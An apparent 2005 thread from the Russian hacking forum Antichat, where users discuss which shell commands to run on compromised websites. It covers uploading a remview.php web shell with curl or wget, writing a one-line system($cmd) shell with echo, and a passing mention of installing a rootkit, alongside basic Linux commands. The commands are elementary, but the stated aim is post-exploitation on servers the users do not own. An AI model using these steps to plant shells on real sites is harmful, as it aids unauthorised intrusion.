Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

26.04.2005, 16:00
|
|
Новичок
Регистрация: 24.03.2005
Сообщений: 2
Провел на форуме: 27671
Репутация:
0
|
|
Команды.
Какие команды можно выполнять на шеллах или найденных уязвимостях ! Допустим я знаю такие команды как pwd , echo , ls -la , wget , cd ,cat.. Но это все команды для листания !! А какими командами можно сливать или заливать файлы на сайт ! Например на некоторых сайтах wget не работает а если я пишу curl -o ./remview.php http://mysite/remview.php то заливается но при попытке обрашения к нему выдает ошибку 302 : Found
The document has moved here
|
|
|

26.04.2005, 16:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Ну тут нужны прямые руки а не банальное знание команд.
Например утилита wget (часто /usr/bin/wget) может скачать по http файл и положить его в папку... Например wget http://.../remview.php -o remview.php
также можно качать файлы lynx'ом (текстовой браузер, мой любимый)
и другими прогами...
/usr/bin/ps пок. список процессов... если тебе нужно поставить хороший руткит, это тоже в аську сдесь долго писать
ещё
можно использовать echo ))
проверь, какие утилиты есть в с-ме: which wget
если все ок, тебе покажут /usr/bin/wget
|
|
|
|

26.04.2005, 20:28
|
|
Участник форума
Регистрация: 14.01.2005
Сообщений: 127
Провел на форуме: 96115
Репутация:
5
|
|
да. у меня похожая проблема. КЕЗ, напипши, пожалуйста как посмотреть какие ваще утилиты установленны. например про вгет и кёрл можно узнать через phpinfo()...
И еще у меня конкретный вопрос: на серваке не стоит ни вгет ни кёрл... через чё можно файло закачивать, что стоит в большинстве систем?
|
|
|

27.04.2005, 06:15
|
|
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
Провел на форуме: 1770063
Репутация:
429
|
|
ЭЭЭэ погодите это все конечно хорошо но при чем тут Взлом Форумов?
Переезжаем.
|
|
|

28.04.2005, 19:39
|
|
Участник форума
Регистрация: 14.01.2005
Сообщений: 127
Провел на форуме: 96115
Репутация:
5
|
|
переехать то переехал, но тему так и не раскрыли =)
|
|
|

28.04.2005, 19:47
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме: 941818
Репутация:
569
|
|
Я ваще с линуом немного на ВЫ, но когда было дело юзал в оснавном:
wget - заливал (если нет его, то средствами php или mysql, смотря куда есть доступ)
tar, gzip - архиваторы
cp - копирование
chmod - сменить чмод файла
mkdir - создать диру
ну и в остальном всякие типа mysqdump итп, не имеющие отношения к линю. Но чаще всего это cd, cat, ls
|
|
|

28.04.2005, 20:28
|
|
Познающий
Регистрация: 16.04.2005
Сообщений: 62
Провел на форуме: 53206
Репутация:
5
|
|
можно ещё такое:
** Записать новую инфу в файл:
echo "my new file content" > file.txt
** Дописать в конец файла:
echo "my add file content" >> file.txt
** Ещё есть замечательная команда: man  Например:
man lynx
** Запуск какой-то утилиты в фоне (на конце знак бэкграунд процесса):
/usr/bin/some_util &
** Полезная команда смены прав:
chmod 777 file1 file2 file3...
|
|
|

30.04.2005, 20:02
|
|
Новичок
Регистрация: 11.04.2005
Сообщений: 7
Провел на форуме: 79502
Репутация:
3
|
|
не понимаю людей короые заливают шелл из одной строчки (system($cmd)) вгетом... а потом кричат что не работает. echo не судьба юзать?
|
|
|

16.07.2005, 07:40
|
|
Новичок
Регистрация: 14.07.2005
Сообщений: 2
Провел на форуме: 544
Репутация:
0
|
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|